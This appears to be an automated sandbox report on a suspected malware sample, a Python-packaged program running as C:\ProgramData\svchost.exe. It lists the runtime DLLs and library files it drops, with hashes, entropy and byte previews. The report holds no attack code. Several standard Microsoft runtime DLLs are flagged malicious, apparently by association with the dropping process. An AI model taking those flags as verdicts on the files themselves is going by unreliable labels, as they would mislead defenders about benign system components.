                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....+..........." .........0...............................................@............`A........................................p...<............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.9059107418499295
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:Xv0WhhW4WvkJ0f5AbVWQ4cRWG142Jp13s5yX01k9z3A3MIMttG5+:sWhhW8aabllxcYR9zEMIM3
                                                                                                                                                          MD5:42EE890E5E916935A0D3B7CDEE7147E0
                                                                                                                                                          SHA1:D354DB0AAC3A997B107EC151437EF17589D20CA5
                                                                                                                                                          SHA-256:91D7A4C39BAAC78C595FC6CF9FD971AA0A780C297DA9A8B20B37B0693BDCD42C
                                                                                                                                                          SHA-512:4FAE6D90D762ED77615D0F87833152D16B2C122964754B486EA90963930E90E83F3467253B7ED90D291A52637374952570BD9036C6B8C9EAEBE8B05663EBB08E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...Aj............" .........0...............................................@......[.....`A.........................................................0...............0..h&..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26224
                                                                                                                                                          Entropy (8bit):4.884873448198051
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:p9cyRWhhWnWGxVA6VWQ4cRWstTmil56CqRqNX01k9z3A8oXMQlE5V:YyRWhhWfxdlv3l5DNR9zrGMH
                                                                                                                                                          MD5:33B85A64C4AF3A65C4B72C0826668500
                                                                                                                                                          SHA1:315DDB7A49283EFE7FCAE1B51EBD6DB77267D8DF
                                                                                                                                                          SHA-256:8B24823407924688ECAFC771EDD9C58C6DBCC7DE252E7EBD20751A5B9DD7ABEF
                                                                                                                                                          SHA-512:B3A62CB67C7FE44CA57AC16505A9E9C3712C470130DF315B591A9D39B81934209C8B48B66E1E18DA4A5323785120AF2D9E236F39C9B98448F88ADAB097BC6651
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...U.gJ.........." .........@...............................................P...........`A.........................................................@...............@..p&..............p............................................................................rdata..n........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22128
                                                                                                                                                          Entropy (8bit):4.744678517210711
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:QWhhW8WGxVA6VWQ4cRWpuWQd9ZnAOVX01k9z3AAcoBVt/p:QWhhW8xdl331AqR9z75x
                                                                                                                                                          MD5:F983F25BF0AD58BCFA9F1E8FD8F94FCB
                                                                                                                                                          SHA1:27EDE57C1A59B64DB8B8C3C1B7F758DEB07942E8
                                                                                                                                                          SHA-256:A5C8C787C59D0700B5605925C8C255E5EF7902716C675EC40960640B15FF5ACA
                                                                                                                                                          SHA-512:AC797FF4F49BE77803A3FE5097C006BB4806A3F69E234BF8D1440543F945360B19694C8ECF132CCFBD17B788AFCE816E5866154C357C27DFEB0E97C0A594C166
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...9.4o.........." .........0...............................................@......j.....`A............................................"............0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):5.19435562954873
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:LpUEpnWlC0i5C5WhhWQWvkJ0f5AbVWQ4cRWFVE7weX01k9z3AUSxi:LptnWm5C5WhhWkaabl4EnR9zVS
                                                                                                                                                          MD5:931246F429565170BB80A1144B42A8C4
                                                                                                                                                          SHA1:E544FAD20174CF794B51D1194FD780808F105D38
                                                                                                                                                          SHA-256:A3BA0EE6A4ABC082B730C00484D4462D16BC13EE970EE3EEE96C34FC9B6EF8ED
                                                                                                                                                          SHA-512:4D1D811A1E61A8F1798A617200F0A5FFBDE9939A0C57B6B3901BE9CA8445B2E50FC736F1DCE410210965116249D77801940EF65D9440700A6489E1B9A8DC0A39
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......eM....`A.........................................................0...............0..h&..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22128
                                                                                                                                                          Entropy (8bit):4.866130836410174
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:mvh8Y17aFBRUWhhW1WGxVA6VWQ4cRWKk4NQlO8X01k9z3AenyHTs5:ALRWhhWhxdl3KlO8R9zhyH2
                                                                                                                                                          MD5:546DA2B69F039DA9DA801EB7455F7AB7
                                                                                                                                                          SHA1:B8FF34C21862EE79D94841C40538A90953A7413B
                                                                                                                                                          SHA-256:A93C8AF790C37A9B6BAC54003040C283BEF560266AEEC3D2DE624730A161C7DC
                                                                                                                                                          SHA-512:4A3C8055AB832EB84DD2D435F49B5B748B075BBB484248188787009012EE29DC4E04D8FD70110E546CE08D0C4457E96F4368802CAEE5405CFF7746569039A555
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...."]..........." .........0...............................................@............`A.........................................................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22128
                                                                                                                                                          Entropy (8bit):4.83017471722019
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:eUnWhhWGWGxVA6VWQ4cRW4Ugd9ZnAOVX01k9z3AAcos:XWhhWyxdlCg31AqR9z7Q
                                                                                                                                                          MD5:D8302FC8FAC16F2AFEBF571A5AE08A71
                                                                                                                                                          SHA1:0C1AEE698E2B282C4D19011454DA90BB5AB86252
                                                                                                                                                          SHA-256:B9AE70E8F74615EA2DC6FC74EC8371616E57C8EFF8555547E7167BB2DB3424F2
                                                                                                                                                          SHA-512:CD2F4D502CD37152C4B864347FB34BC77509CC9E0E7FE0E0A77624D78CDA21F244AF683EA8B47453AA0FA6EAD2A0B2AF4816040D8EA7CDAD505F470113322009
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...6..q.........." .........0...............................................@......=.....`A............................................e............0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):30312
                                                                                                                                                          Entropy (8bit):5.1326972903419925
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:+7yaFM4Oe59Ckb1hgmLNWhhWLmaabsFNY+R9zITl:MFMq59Bb1jg3zgNYi9zIh
                                                                                                                                                          MD5:E9036FD8B4D476807A22CB2EB4485B8A
                                                                                                                                                          SHA1:0E49D745643F6B0A7D15EA12B6A1FE053C829B30
                                                                                                                                                          SHA-256:BFC8AD242BF673BF9024B5BBE4158CA6A4B7BDB45760AE9D56B52965440501BD
                                                                                                                                                          SHA-512:F1AF074CCE2A9C3A92E3A211223E05596506E7874EDE5A06C8C580E002439D102397F2446CE12CC69C38D5143091443833820B902BB07D990654CE9D14E0A7F0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................" .........P...............................................`.......,....`A.............................................%...........P...............P..h&..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22024
                                                                                                                                                          Entropy (8bit):4.856891868078439
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:PeXrqjd7xWhhWYWGxVA6VWQ42WnsxgV8FGecX01k9z3Ax+eXVG6:P4roWhhWAxdeHR9zi9r
                                                                                                                                                          MD5:AD586EA6AC80AC6309421DEEEA701D2F
                                                                                                                                                          SHA1:BC2419DFF19A9AB3C555BC00832C7074EC2D9186
                                                                                                                                                          SHA-256:39E363C47D4D45BEDA156CB363C5241083B38C395E4BE237F3CFEDA55176453C
                                                                                                                                                          SHA-512:15C17CBA6E73E2E2ADB0E85AF8ED3C0B71D37D4613D561CE0E818BDB2CA16862253B3CB291E0CF2475CEDCB7CE9F7B4D66752817F61CF11C512869EF8DABC92A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...<SdT.........." .........0...............................................@............`A............................................x............0...............0...&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26216
                                                                                                                                                          Entropy (8bit):5.016983259688826
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:RmGqX8mPrpJhhf4AN5/Ki9WhhWalWvkJ0f5AbVWQ4cRWpfd9ZnAOVX01k9z3AAco:Rysyr7LWhhWgaablu31AqR9z7
                                                                                                                                                          MD5:3AE4741DB3DDBCB205C6ACBBAE234036
                                                                                                                                                          SHA1:5026C734DCEE219F73D291732722691A02C414F2
                                                                                                                                                          SHA-256:C26540E3099FA91356EE69F5058CF7B8AEE63E23D6B58385476D1883E99033C3
                                                                                                                                                          SHA-512:9DD5E12265DA0F40E3C1432FB25FD19BE594684283E961A2EAFFD87048D4F892D075DCD049AB08AEEE582542E795A0D124B490D321D7BEB7963FD778EF209929
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....TR.........." .........@...............................................P............`A............................................4............@...............@..h&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26216
                                                                                                                                                          Entropy (8bit):5.289373435146636
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:mV2oFVh/WhhWqaablTUmEjezWSR9zchT1:mZcXzemiq9zW
                                                                                                                                                          MD5:9A7E2A550C64DABFF61DAD8D1574C79A
                                                                                                                                                          SHA1:8908DE9D45F76764140687389BFAED7711855A2D
                                                                                                                                                          SHA-256:DB059947ACE80D2C801F684A38D90FD0292BDAA1C124CD76467DA7C4329A8A32
                                                                                                                                                          SHA-512:70A6EB10A3C3BAD45BA99803117E589BDA741ECBB8BBDD2420A5AE981003AEBE21E28CB437C177A3B23F057F299F85AF7577FEC9693D59A1359E5FFC1E8EAABD
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...k. U.........." .........@...............................................P......="....`A............................................a............@...............@..h&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-string-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26224
                                                                                                                                                          Entropy (8bit):5.286281713611342
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:ECV5yguNvZ5VQgx3SbwA71IkFltor9zLszv:35yguNvZ5VQgx3SbwA71IutoBzLU
                                                                                                                                                          MD5:CF115DB7DCF92A69CB4FD6E2AE42FED5
                                                                                                                                                          SHA1:B39AA5ECA6BE3F90B71DC37A5ECF286E3DDCA09A
                                                                                                                                                          SHA-256:EB8FE2778C54213AA2CC14AB8CEC89EBD062E18B3E24968ACA57E1F344588E74
                                                                                                                                                          SHA-512:8ABD2754171C90BBD37CA8DFC3DB6EDAF57CCDD9BC4CE82AEF702A5CE8BC9E36B593DC863D9A2ABD3B713A2F0693B04E52867B51CD578977A4A9FDE175DBA97A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.... .h.........." .........@...............................................P.......p....`A.........................................................@...............@..p&..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-time-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):5.246244940293721
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ms3hwD2WhhWLjWvkJ0f5AbVWQ4cRWcBweNQlO8X01k9z3AenDqzq:dWhhWTaabl3weKlO8R9zhDgq
                                                                                                                                                          MD5:82E6D4FF7887B58206199E6E4BE0FEAF
                                                                                                                                                          SHA1:943E42C95562682C99A7ED3058EA734E118B0C44
                                                                                                                                                          SHA-256:FB425BF6D7EB8202ACD10F3FBD5D878AB045502B6C928EBF39E691E2B1961454
                                                                                                                                                          SHA-512:FF774295C68BFA6B3C00A1E05251396406DEE1927C16D4E99F4514C15AE674FD7AC5CADFE9BFFFEF764209C94048B107E70AC7614F6A8DB453A9CE03A3DB12E0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...G............" .........0...............................................@......1&....`A.........................................................0...............0..h&..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-utility-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22120
                                                                                                                                                          Entropy (8bit):4.804443409916024
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:gj/fHQduzWhhWxWvkJ0f5AbVWQ4cRWIknb7jepVWnSX01k9z3AThTVtXKX7:gj/fFWhhWJaablMb7jezWSR9zchT2X
                                                                                                                                                          MD5:9A3B4E5B18A946D6954F61673576FA11
                                                                                                                                                          SHA1:74206258CFD864F08E26EA3081D66297221B1D52
                                                                                                                                                          SHA-256:CE74A264803D3E5761ED2C364E2196AC1B391CB24029AF24AEE8EF537EC68738
                                                                                                                                                          SHA-512:DA21178F2E7F4B15C28AE7CB0CC5891EAA3BDD0192042965861C729839983C7DCBA9CFB96930B52DBE8A592B4713AA40762E54D846B8135456A09AE5BACBB727
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......W.....`A............................................^............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\base_library.zip

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):880569
                                                                                                                                                          Entropy (8bit):5.682992961060893
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:lgYJu4KXWyBC6S4IEa8A4a2YID3dOVwx/fpEWertSLMNu:lgYJiVBFLa2vIVwx/fpEWe+MNu
                                                                                                                                                          MD5:362D93516DEB1D6E6F9B8076415D9122
                                                                                                                                                          SHA1:029541DDA9199A5FB84138D76049A4F42D603C36
                                                                                                                                                          SHA-256:887F69E682EBD3A402D9E3462910D8EAB88D8AA8066F71B7D0AB28B1306A4314
                                                                                                                                                          SHA-512:F1FDADD9CFD8DA84B1BEFFA12BCA2B4C26DFEF146204CF45EE8395B9F3419BDE0E9106BE82414D01B3509FE83D09EFD0BBB40D530B0A790DCB4A51A031FE4EDA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK..........!..^".5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\bcrypt\_bcrypt.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):316928
                                                                                                                                                          Entropy (8bit):6.399172981599646
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:RrdaOOOJPELEbEhSoKbVeKuJgu3rAkbK7xokgwHSkbj57ytyE/pZxFuVpOUrjenn:SO2h0b0KuJguLbLFhkn57MyE3xFWpOn
                                                                                                                                                          MD5:169518669942F1B7C9A0BC4D0D98651F
                                                                                                                                                          SHA1:4C2132A29ABCD0B2E26F96D7BA54BC8968CC4853
                                                                                                                                                          SHA-256:4904336E5DDD08DB8BE7694EEF0D1D83DE6799D6412952A82DCA4847A3F46251
                                                                                                                                                          SHA-512:270AB970EB7C9BD5DB40FEF76F78FCA68A40266390F16D971C946A086F7C079314B78E068477CD083D9FAE2E76EE7CC8A4D8BA7DDC4F5F5B0C78767B77A4F858
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^R...3...3...3...K...3.......3.......3.......3.......3.. ....3...F...3..QK...3...3...3...3..H3..w....3..w....3..Rich.3..........PE..d....e|e.........." ...&.b...p.......$....................................................`.............................................T........................"...................D..T....................E..(...PC..@............... ............................text...7`.......b.................. ..`.rdata..D?.......@...f..............@..@.data...............................@....pdata...".......$..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\certifi\cacert.pem

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):292541
                                                                                                                                                          Entropy (8bit):6.048162209044241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
                                                                                                                                                          MD5:D3E74C9D33719C8AB162BAA4AE743B27
                                                                                                                                                          SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
                                                                                                                                                          SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
                                                                                                                                                          SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography-42.0.5.dist-info\INSTALLER

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4
                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:pip.

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography-42.0.5.dist-info\LICENSE

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):197
                                                                                                                                                          Entropy (8bit):4.61968998873571
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                          MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                          SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                          SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                          SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography-42.0.5.dist-info\LICENSE.APACHE

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11360
                                                                                                                                                          Entropy (8bit):4.426756947907149
